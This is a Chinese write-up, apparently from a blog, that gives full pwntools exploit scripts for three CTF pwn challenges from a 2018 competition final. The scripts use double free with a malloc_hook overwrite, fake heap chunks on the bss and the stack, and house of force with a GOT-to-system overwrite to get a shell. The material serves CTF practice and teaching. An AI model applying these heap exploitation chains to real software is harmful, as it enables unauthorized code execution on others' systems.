文章目录
  1. 1. 0x01 littlenote
  2. 2. 0x02 bookstore
  3. 3. 0x03 myhouse

2018铁三赛决赛三道pwn题exp


0x01 littlenote

double free和写malloc_hook

from pwn import *

#context.log_level="debug"
p = process("./littlenote")
libc = ELF("./libc.so.6")

def add(data):
    p.recvuntil("choice:")
    p.sendline(str(1))
    p.recvuntil("your note")
    p.send(data)
    p.recvuntil("keep your note?")
    p.send("Y\x00")

def show(idx):
    p.recvuntil("choice:")
    p.sendline(str(2))
    p.recvuntil("show?")
    p.sendline(str(idx))

def dele(idx):
    p.recvuntil("choice:")
    p.sendline(str(3))
    p.recvuntil("delete?")
    p.sendline(str(idx))

add("A"*0x10)
add("B"*0x10)
add("C"*0x10)
add("D"*0x10+p64(0)+p64(0x51))
dele(1)
dele(0)
dele(1)
show(0)
p.recvline()
heap = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
print hex(heap)
add(p64(heap+0x10)+p64(0x71))
add("\x00")
add(p64(heap+0x10)+p64(0x71))
add("F"*0x50+p64(0)+p64(0x91))
dele(2)
show(2)
p.recvline()
main = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
libc_addr = (main - 88) - 0x3C4B20
print hex(libc_addr)
malloc_hook = libc_addr + libc.symbols['__malloc_hook']
print hex(malloc_hook)
add("1"*0x10) #8
add("2"*0x10) #9
add("3"*0x10)
dele(9)
dele(8)
dele(9)
add(p64(malloc_hook-27-0x8))
add("5"*0x10)
add(p64(malloc_hook-27-0x8))
one_gadget = 0xf0274
add("A"*19+p64(libc_addr + one_gadget))
p.recvuntil(":")
p.sendline(str(1))
p.interactive()

0x02 bookstore

在bss段和stack上伪造chunk

from pwn import *

def ru(data,drop=False):
    return p.recvuntil(data,drop=drop)

def rl():
    return p.recvline()

def ra():
    return p.recvall()

def r(l):
    return p.recv(l)

def sl(data):
    p.sendline(data)

def s(data):
    p.send(data)

def ga(data,rd="\x0a"):
    ru(data)
    return u64(ru(rd,drop=True).ljust(8,"\x00"))

def g():
    gdb.attach(p)
    raw_input()

def ri():
    raw_input()

def add(author,l,book):
    ru("choice:")
    sl(str(1)+"\x00"*0x7)
    ru("author")
    sl(author)
    ru("long")
    sl(str(l))
    ru("book?")
    sl(book)

def read(idx):
    ru(":")
    sl(str(3))
    ru("sell")
    sl(str(idx))

def sell(idx):
    ru(":")
    sl(str(2))
    ru("sell")
    sl(str(idx))

def et():
    ru(":")
    sl(str(4))

if __name__ == '__main__':
    #context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process("./bookstore")
    add("A"*0x10,0x10,"1"*0x8)
    add("B"*0x10,0x40,"2"*0x10)
    add("C"*0x10,0x40,"3"*0x10) 
    add("D"*0x10,0x40,"4"*0x10) 
    sell(0)
    add(p64(0)+p64(0x51),0,p64(0)*3+p64(0xa1))
    sell(1)
    add("W"*0x10,0x40,'6'*8)
    read(1)
    main = ga("6"*0x8)
    libc_addr = (main - 232) - 0x3C4B20 
    print hex(libc_addr)
    env = libc_addr + libc.symbols['environ']
    print hex(env)
    sell(0)
    sell(1)
    add(p64(0)+p64(0x51),0,p64(0)*3+p64(0x51)+p64(0x602060))
    add("X"*0x10,0x40,'2'*0x10)
    add("Z"*0x10,0x40,p64(0)*2+p64(env))
    read(0)
    stack = ga("name:")
    print hex(stack)
    fake = stack - 0x110
    print hex(fake)
    one = libc_addr + 0x45216
    add("A"*0x10,0x10,"1"*0x8)
    add("B"*0x10,0x20,"2"*0x10)
    add("C"*0x10,0x20,"3"*0x10) 
    sell(5)
    sell(6)
    add('s'*0x10,0,p64(0)*3+p64(0x31)+p64(fake))
    add("B"*0x10,0x20,"2"*0x10)
    add('A'*0x10,0x20,p64(0)+p64(0x400c70)+p64(one)) 
    et()
    p.interactive()

0x03 myhouse

一个任意地址写null漏洞和house of force

from pwn import *

def ru(data,drop=False):
    return p.recvuntil(data,drop=drop)

def rl():
    return p.recvline()

def ra():
    return p.recvall()

def r(l):
    return p.recv(l)

def sl(data):
    p.sendline(data)

def s(data):
    p.send(data)

def ga(data,rd="\x0a"):
    ru(data)
    return u64(ru(rd,drop=True).ljust(8,"\x00"))

def g():
    gdb.attach(p)
    raw_input()

def ri():
    raw_input()

def gp():
    print proc.pidof(p)[0]
    ri()

def add(n,hn,hs1,hs,hd):
    ru("What's your name?")
    s(n)
    ru("name of your house?")
    s(hn)
    ru("size of your house?")
    s(str(hs1))
    ru("Too large!")
    s(str(hs))
    ru("description:\n")
    s(hd)

def broom(rs):
    ru("choice:")
    sl(str(1))
    ru("size of your room")
    sl(str(rs))

def droom(rd):
    ru("choice:")
    sl(str(2))
    ru("more shining")
    sl(rd)

def view():
    ru("choice:")
    sl(str(3))

if __name__ == '__main__':
    # context.log_level = "debug"
    libc = ELF("./libc.so.6")
    p = process("./myhouse")
    top = 0x3c4b78
    size = 0x201000
    ps = size - 0x10 + top + 1
    # mmap to libc before, modify top chunk low bit to null
    add("A"*0x20 ,"1"*0xf0+p64(0)+p64(0xffffffffffffffff),ps,0x200000,'2'*0x20)
    view()
    heap = ga("A"*0x20)
    bss = 0x6020b0 
    hs = bss - (heap + 0x100)
    print hex(heap)
    print hex(hs)
    # modify top chunk to bss segment
    broom(hs)
    # alloc chunk in bss segment 
    broom(0x60)
    atoi = 0x602058
    pay = p64(atoi) + p64(atoi) + p64(8)
    # modify the ptr to got
    droom(pay)
    # leak atoi really addring
    view()
    atoi_addr = ga("description:\x0a")
    print hex(atoi_addr)
    system_addr = atoi_addr -libc.symbols['atoi'] + libc.symbols['system']
    print hex(system_addr)
    # modify got of atoi to system addr
    droom(p64(system_addr))
    ru("choice:")
    # get shell
    s("/bin/sh\x00")
    ru("choice:")    
    p.interactive()
文章目录
  1. 1. 0x01 littlenote
  2. 2. 0x02 bookstore
  3. 3. 0x03 myhouse